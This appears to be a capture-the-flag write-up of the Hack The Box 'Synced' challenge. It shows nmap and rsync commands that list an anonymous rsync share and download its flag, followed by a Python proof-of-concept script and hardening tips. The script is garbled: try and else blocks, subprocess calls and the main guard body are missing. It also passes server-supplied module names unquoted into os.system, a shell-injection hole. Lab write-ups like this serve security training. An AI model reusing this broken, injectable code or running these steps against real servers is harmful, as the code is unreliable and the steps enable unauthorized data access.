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HTB Synced - Write-up

Prepared by: #AfterDark


The HTB Synced challenge involves exploiting a misconfigured Rsync service that allows anonymous access. Rsync is a fast and powerful file copying tool used for backups and synchronizations. However, when improperly configured, it can expose sensitive data.

This write-up will guide you through identifying and exploiting Rsync to retrieve the flag.


Step 1: Nmap Scan

We start with an Nmap scan to identify open ports and running services.

nmap -p- --min-rate=1000 -sV {target_IP}

The scan results show:

873/tcp open  rsync

Port 873 is open, running an Rsync daemon, confirming the presence of an Rsync service.


Step 2: Listing Available Rsync Modules

Rsync allows us to list available shares using the --list-only option:

rsync --list-only {target_IP}::


public          Anonymous Share

The public module is accessible. We now check its contents:

rsync --list-only {target_IP}::public



The flag.txt file is inside the public share.

Step 3: Downloading the Flag

We can download flag.txt using:

rsync {target_IP}::public/flag.txt flag.txt

Once downloaded, we read its contents:

cat flag.txt



Congratulations! 🎉 You've successfully exploited Rsync and retrieved the flag.


  • Rsync, when misconfigured, allows anonymous access.
  • Listing available modules (--list-only) can reveal sensitive directories.
  • Data can be copied using Rsync commands.
  • Always ensure Rsync is properly secured to prevent unauthorized access.

PoC Script

The following Python script automates the exploitation process:

import os
import subprocess
import ipaddress

def get_target_ip():
    while True:
        target = input("Enter the target IP: ").strip()
            return target
        except ValueError:
            print("[-] Invalid IP address. Please enter a valid IP.")

def scan_rsync(target):
    print(f"[+] Scanning Rsync on {target}:873")
    result =["nmap", "-p873", target], capture_output=True, text=True)
    if "873/tcp open" in result.stdout.lower():
        print("[+] Rsync is running.")
        print("[-] Rsync not detected.")

def extract_modules(target):
    print("[+] Extracting Rsync modules...")
    result =["rsync", f"rsync://{target}/"], capture_output=True, text=True)
    modules = [line.split()[0] for line in result.stdout.split("
") if line.strip()]
    if modules:
        print("[+] Found Rsync modules:", ", ".join(modules))
        return modules
        print("[-] No modules found.")

def download_flag(target, module):
    print(f"[+] Downloading from module: {module}")
    os.system(f"rsync -av rsync://{target}/{module}/ loot/")
    print("[+] Flag saved in loot/")

def main():
    target = get_target_ip()
    modules = extract_modules(target)
    for module in modules:
        download_flag(target, module)

if __name__ == "__main__":

Defensive Measures

To secure Rsync, follow these best practices:

  • Disable anonymous access by setting auth users in rsyncd.conf.
  • Restrict IP access using hosts allow and hosts deny settings.
  • Run Rsync over SSH instead of in daemon mode.
  • Use authentication to prevent unauthorized access.

Stay safe, and happy hacking! 🚀

Write-up by #AfterDark